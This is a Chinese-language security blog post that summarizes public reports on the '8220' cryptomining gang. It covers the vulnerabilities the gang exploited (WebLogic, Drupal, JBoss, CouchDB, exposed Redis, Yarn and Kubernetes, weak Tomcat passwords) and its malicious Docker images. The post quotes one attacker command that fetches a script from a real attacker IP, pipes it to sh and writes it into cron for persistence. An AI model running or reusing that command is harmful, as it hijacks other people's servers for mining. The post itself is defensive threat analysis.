<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>8220挖矿团伙学习分析 | Hait`s Blog</title>
  <meta name="description" content="8220挖矿团伙学习分析 历史报告阅读：奇安信披露： https:&#x2F;&#x2F;ti.qianxin.com&#x2F;blog&#x2F;articles&#x2F;8220-mining-gang-in-china&#x2F; 腾讯披露： https:&#x2F;&#x2F;mp.weixin.qq.com&#x2F;s?__biz&#x3D;MzI5ODk3OTM1Ng&#x3D;&#x3D;&amp;mid&#x3D;2247486539&amp;idx&#x3D;1&amp;sn&#x3D;724462c15a1ffe78c">
<meta property="og:type" content="article">
<meta property="og:title" content="8220挖矿团伙学习分析">
<meta property="og:url" content="https://xiaoxiaowensheng.github.io/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="hait&#96;blogs">
<meta property="og:description" content="8220挖矿团伙学习分析 历史报告阅读：奇安信披露： https:&#x2F;&#x2F;ti.qianxin.com&#x2F;blog&#x2F;articles&#x2F;8220-mining-gang-in-china&#x2F; 腾讯披露： https:&#x2F;&#x2F;mp.weixin.qq.com&#x2F;s?__biz&#x3D;MzI5ODk3OTM1Ng&#x3D;&#x3D;&amp;mid&#x3D;2247486539&amp;idx&#x3D;1&amp;sn&#x3D;724462c15a1ffe78c">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://xiaoxiaowensheng.github.io/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/media/d7954ce8f30c17a5f524385298e71d26.png">
<meta property="article:published_time" content="2020-01-23T03:01:06.845Z">
<meta property="article:modified_time" content="2020-01-23T03:00:08.710Z">
<meta property="article:author" content="hait jia">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xiaoxiaowensheng.github.io/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/media/d7954ce8f30c17a5f524385298e71d26.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://xiaoxiaowensheng.github.io/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/index.html">
  
    <link rel="alternate" href="/atom.xml" title="hait`blogs" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 4.2.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/xiaoxiaowensheng" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">hait</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">attack&amp;defender</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Beijing, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">Categories</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">Tags</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">Repository</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-books">
          <a href="/books">
            
            <i class="icon icon-book-fill"></i>
            
            <span class="menu-title">Books</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">Links</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">About</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="http://weibo.com/" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</p>
            </div>
        </div>
    </div>
</div>

    
      

    
      
  <div class="widget">
    <h3 class="widget-title">Tags</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/public/tags/%E5%AE%89%E5%85%A8%E5%88%86%E6%9E%90/" rel="tag">安全分析</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget-body tagcloud">
      <a href="/public/tags/%E5%AE%89%E5%85%A8%E5%88%86%E6%9E%90/" style="font-size: 13px;">安全分析</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">Archive</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/public/archive/2020/01/">January 2020</a><span class="archive-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/" class="title">8220挖矿团伙学习分析</a>
              </p>
              <p class="item-date">
                <time datetime="2020-01-23T03:01:06.845Z" itemprop="datePublished">2020-01-23</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2020/01/23/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0/" class="title">无文件攻击学习</a>
              </p>
              <p class="item-date">
                <time datetime="2020-01-23T02:52:54.292Z" itemprop="datePublished">2020-01-23</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2020/01/23/iqy%E5%AD%A6%E4%B9%A0/" class="title">iqy学习</a>
              </p>
              <p class="item-date">
                <time datetime="2020-01-23T02:41:23.745Z" itemprop="datePublished">2020-01-23</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2020/01/22/%E5%AE%89%E5%85%A8%E5%88%86%E6%9E%90/" class="title">安全分析</a>
              </p>
              <p class="item-date">
                <time datetime="2020-01-21T19:43:28.000Z" itemprop="datePublished">2020-01-22</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-8220挖矿团伙学习分析" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      8220挖矿团伙学习分析
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/" class="article-date">
	  <time datetime="2020-01-23T03:01:06.845Z" itemprop="datePublished">2020-01-23</time>
	</a>
</span>
        
        

        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/#comments" class="article-comment-link">Comments</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <p>8220挖矿团伙学习分析</p>
<h1 id="历史报告阅读："><a href="#历史报告阅读：" class="headerlink" title="历史报告阅读："></a>历史报告阅读：</h1><p>奇安信披露：</p>
<p><a href="https://ti.qianxin.com/blog/articles/8220-mining-gang-in-china/" target="_blank" rel="noopener">https://ti.qianxin.com/blog/articles/8220-mining-gang-in-china/</a></p>
<p>腾讯披露：</p>
<p><a href="https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247486539&amp;idx=1&amp;sn=724462c15a1ffe78c94ac988d0c3f0f9&amp;scene=21#wechat_redirect" target="_blank" rel="noopener">https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247486539&amp;idx=1&amp;sn=724462c15a1ffe78c94ac988d0c3f0f9&amp;scene=21#wechat_redirect</a></p>
<h1 id="现场发现情况："><a href="#现场发现情况：" class="headerlink" title="现场发现情况："></a>现场发现情况：</h1><p>客户机器从<a href="user_cancel">http://104.244.75.25</a>的80端口下载.sh.tgz文件，本次分析发现攻击者使用的是weblogic漏洞打进来上传jsp木马，又通过木马文件下载恶意样本。</p>
<h1 id="通过该木马历史攻击手段学习："><a href="#通过该木马历史攻击手段学习：" class="headerlink" title="通过该木马历史攻击手段学习："></a>通过该木马历史攻击手段学习：</h1><h2 id="活动事件线："><a href="#活动事件线：" class="headerlink" title="活动事件线："></a>活动事件线：</h2><p><img src="media/d7954ce8f30c17a5f524385298e71d26.png" alt=""></p>
<h2 id="涉及漏洞点："><a href="#涉及漏洞点：" class="headerlink" title="涉及漏洞点："></a>涉及漏洞点：</h2><h3 id="WebLogic漏洞攻击事件"><a href="#WebLogic漏洞攻击事件" class="headerlink" title="WebLogic漏洞攻击事件"></a>WebLogic漏洞攻击事件</h3><p>攻击者利用WebLogic<br>XMLDecoder反序列化漏洞（编号CVE-2017-10271[4]）攻击服务器，并获取服务器控制权限，进而植入挖矿木马进行挖矿。该漏洞出现在WebLogic<br>Server Security Service中，影响WebLogic Server<br>12.2.1.2.0及其之前的版本。利用此漏洞，攻击者下载名为2.ps1的PowerShell脚本并执行。脚本进而会下载挖矿木马程序，进行挖矿活动。同时，该脚本也会终止其他挖矿程序运行，保证自己独占CPU资源。</p>
<h3 id="Drupal漏洞利用"><a href="#Drupal漏洞利用" class="headerlink" title="Drupal漏洞利用"></a>Drupal漏洞利用</h3><p>Drupal的远程任意代码执行漏洞是由于Drupal对表单的渲染引起的。为了能够在表单渲染对过程中动态修改数据，Drupal引入了“Drupal<br>Render API”机制[7]，“Drupal Render<br>API”对于#会进行特殊处理，其中#pre_render在render之前操作数组，#post_render接收render的结果并在其添加包装，#lazy_builder用于在render过程的最后添加元素。由于对于部分#属性数组值，Drupal会通过call_user_func的方式进行处理，导致任意代码执行。漏洞验证POC[8]，利用此POC可快速验证Drupal是否存在该漏洞。（<a href="https://github.com/a2u/CVE-2018-7600" target="_blank" rel="noopener">https://github.com/a2u/CVE-2018-7600</a>）</p>
<p>“8220挖矿团伙”利用此漏洞下载并执行挖矿程序。其中的Shell恶意脚本代码将wget -q<br><a href="http://192.99.142.235:8220/logo4.jpg" target="_blank" rel="noopener">http://192.99.142.235:8220/logo4.jpg</a> -O - |<br>sh命令写入任务计划，实现对服务器的持续感染。同时从192.99.142.235:8220下载配置文件3.json和挖矿程序rig，分别保存为config.json和sustes，最后利用nohup命令在后台运行挖矿。</p>
<h3 id="其它漏洞利用列表"><a href="#其它漏洞利用列表" class="headerlink" title="其它漏洞利用列表"></a>其它漏洞利用列表</h3><table>
<thead>
<tr>
<th>服务</th>
<th>利用说明</th>
</tr>
</thead>
<tbody><tr>
<td>JBoss</td>
<td>利用JBoss反序列化命令执行漏洞（编号CVE-2017-12149[9]），漏洞影响5.X和6.X版本。利用此漏洞可在未经任何身份验证的服务器主机上执行任意代码。”8220挖矿团伙”利用此漏洞下载并执行PowerShell脚本，进行挖矿活动。 （<a href="user_cancel">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12149</a>）</td>
</tr>
<tr>
<td>Couchdb</td>
<td>利用Couchdb的组合漏洞（编号CVE-2017-12635[10], CVE–2017–12636[11]）。利用CVE-2017-12635漏洞，可以给自身添加管理员权限；利用CVE-2017-12636，可以实现远程任意代码执行。”8220挖矿团伙”利用这两个漏洞完成对目标的攻击，进行挖矿活动。 （<a href="user_cancel">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635</a>、<a href="user_cancel">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636</a> ）</td>
</tr>
<tr>
<td>Redis</td>
<td>Redis默认情况下运行在0.0.0.0:6379上。若Redis服务暴露在公网，同时没有开启认证，则攻击者可以在未授权的情况下访问Redis服务，执行恶意操作。”8220挖矿团伙”通过网络扫描工具，发现存在该漏洞的主机，并进行攻击，实现挖矿活动。</td>
</tr>
<tr>
<td>Hadoop Yarn</td>
<td>Yarn的ResourceManager UI默认运行在0.0.0.0:8088端口上，允许用户通过接口进行相关的应用创建、任务提交执行等操作。若该服务暴露在公网，同时没有开启认证，则攻击者可以在未授权访问的情况下执行恶意操作。”8220挖矿团伙”利用此漏洞进行远程命令执行，实现挖矿活动。 <a href="user_cancel">https://www.cnblogs.com/qcloud1001/p/9173253.html</a></td>
</tr>
<tr>
<td>Kubernetes</td>
<td>Kubelet默认开启10255和10250端口，攻击者可以在未授权的情况下执行恶意操作。”8220挖矿团伙”利用该漏洞，远程执行下载脚本的命令，实现在容器中的挖矿活动。 <a href="user_cancel">https://blog.csdn.net/weixin_30267785/article/details/99456781</a> <a href="user_cancel">https://www.cnblogs.com/birdstudio/p/7650622.html</a> <a href="user_cancel">https://www.cnblogs.com/elisun/p/7113745.html</a></td>
</tr>
<tr>
<td>tomcat</td>
<td>通过Tomcat Manager后台弱口令进行爆破，爆破成功后，黑客上传了一个war包（jexws3.war），该war包中包含了一个Jsp webshell（jexws3.jsp），并且该webshell拥有最高权限。黑客通过Jsp webshell执行命令下载勒索病毒和挖矿木马<a href="user_cancel">https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247486214&amp;idx=1&amp;sn=a54b0830a8b629b433f3cadae0ae19e2&amp;scene=21#wechat_redirect</a></td>
</tr>
</tbody></table>
<h3 id="Docker镜像利用（供应链攻击）"><a href="#Docker镜像利用（供应链攻击）" class="headerlink" title="Docker镜像利用（供应链攻击）"></a>Docker镜像利用（供应链攻击）</h3><p>奇安信威胁情报中心还发现国外一篇关于Docker<br>Hub镜像的安全研究报告[12]中，疑似出现“8220挖矿团伙”的身影。报告指出，从2017年05月注册账号开始，到2018年05月删除账号结束，该账号陆续上传了17个恶意docker镜像，镜像下载量达到500万次以上。这些镜像的功能大致可分为如下四类：</p>
<ol>
<li><p>反弹主机的SHELL</p>
</li>
<li><p>向主机中添加SSH公钥</p>
</li>
<li><p>在主机中添加任务计划</p>
</li>
<li><p>利用镜像完成挖矿</p>
</li>
</ol>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://xiaoxiaowensheng.github.io/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/" title="8220挖矿团伙学习分析" target="_blank" rel="external">https://xiaoxiaowensheng.github.io/2020/01/23/8220%E6%8C%96%E7%9F%BF%E5%9B%A2%E4%BC%99%E5%AD%A6%E4%B9%A0%E5%88%86%E6%9E%90/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/xiaoxiaowensheng" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/xiaoxiaowensheng" target="_blank"><span class="text-dark">hait</span><small class="ml-1x">attack&amp;defender</small></a></h3>
        <div>个人简介。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    
    <li class="next">
      <a href="/2020/01/23/%E6%97%A0%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0/" title="无文件攻击学习"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>$</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>Maybe you could buy me a cup of coffee.</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/alipayimg.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open alipay app scan this qrcode, buy me a coffee!</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/wechatpayimg.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open wechat app scan this qrcode, buy me a coffee!</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> alipay</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> wechat payment</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="http://weibo.com/" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>